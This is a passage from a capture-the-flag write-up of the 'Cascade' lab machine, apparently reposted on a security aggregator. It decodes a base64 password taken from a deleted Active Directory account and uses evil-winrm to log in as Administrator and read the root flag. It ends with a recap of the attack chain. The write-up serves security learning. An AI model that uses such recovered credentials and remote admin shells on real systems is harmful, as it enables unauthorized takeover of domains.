modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : [email protected]
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AMLooks like it’s Base64 encoded again.
jbrown@Jabaris-MacBook-Pro cascade % echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles% Since the account is deleted, we can’t log in as TempAdmin directly.But remember what we found earlier:
“Username is TempAdmin (password is the same as the normal admin account password).”
That’s the key.
If TempAdmin’s password matches the normal Administrator account…And we just decoded the password from the cascadeLegacyPwd attribute…Then we don’t need TempAdmin at all.We can just authenticate as Administrator.
jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.42.114 -u Administrator -p baCT3r1aN00dles
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> ls Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/26/2020 11:56 PM Contacts
d-r--- 11/8/2021 3:58 PM Desktop
d-r--- 1/28/2020 6:26 PM Documents
d-r--- 1/26/2020 11:56 PM Downloads
d-r--- 1/26/2020 11:56 PM Favorites
d-r--- 1/26/2020 11:56 PM Links
d-r--- 1/26/2020 11:56 PM Music
d-r--- 1/26/2020 11:56 PM Pictures
d-r--- 1/26/2020 11:56 PM Saved Games
d-r--- 1/26/2020 11:56 PM Searches
d-r--- 1/26/2020 11:56 PM Videos
-a---- 3/25/2020 11:17 AM 645729 wds_current_setup.exe
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/3/2026 12:53 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
**RootFlagFoundHere****
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
And just like that — we’re Administrator.
What started as anonymous LDAP enumeration turned into:
- User discovery
- Custom attribute credential leakage
- SMB pivoting
- Database analysis
- .NET reverse engineering
- AES decryption
- AD Recycle Bin abus
- And finally, full domain compromise
This box was a perfect reminder that AD isn’t about one big exploit.
It’s about chaining small misconfigurations together.
Another step forward in the AD journey.
On to the next one.
如有侵权请联系:admin#unsafe.sh